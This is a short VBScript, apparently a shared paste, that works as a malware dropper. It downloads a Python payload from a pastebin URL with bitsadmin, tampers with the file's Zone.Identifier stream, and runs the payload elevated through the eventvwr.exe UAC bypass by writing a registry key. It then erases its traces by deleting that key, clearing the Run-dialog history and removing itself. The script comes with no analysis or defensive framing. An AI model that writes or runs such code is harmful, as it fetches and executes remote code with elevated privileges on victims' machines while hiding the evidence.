pyonline

1. Sub Main()
2.     'Download File
3.     CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND https://pastebin.com/DNCvCu8H.py %temp%/update.py"),0,true
4.     'Set new zoneId
5.     CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\update.py:ZONE.identifier"),0,true
6.     'Write UAC bypass regkey
7.     CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\update.py" ,"REG_SZ"
8.     'Trigger UAC bypass
9.     CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
10.     'Reset regkey
11.     GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
12.     'Clear the run-dialog history
13.     CreateObject("WScript.Shell").Run("cmd.exe /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f "),0,true
14.     'Remove this script
15.     CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
16. End Sub
17. 'Dont wanna display shit
18. On Error Resume Next
19.  
20.   Main
21.  
22.  
23.   If Err.Number Then
24.  
25.      'on error cleanup and exit
26.  
27.     CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
28.  
29.      WScript.Quit 4711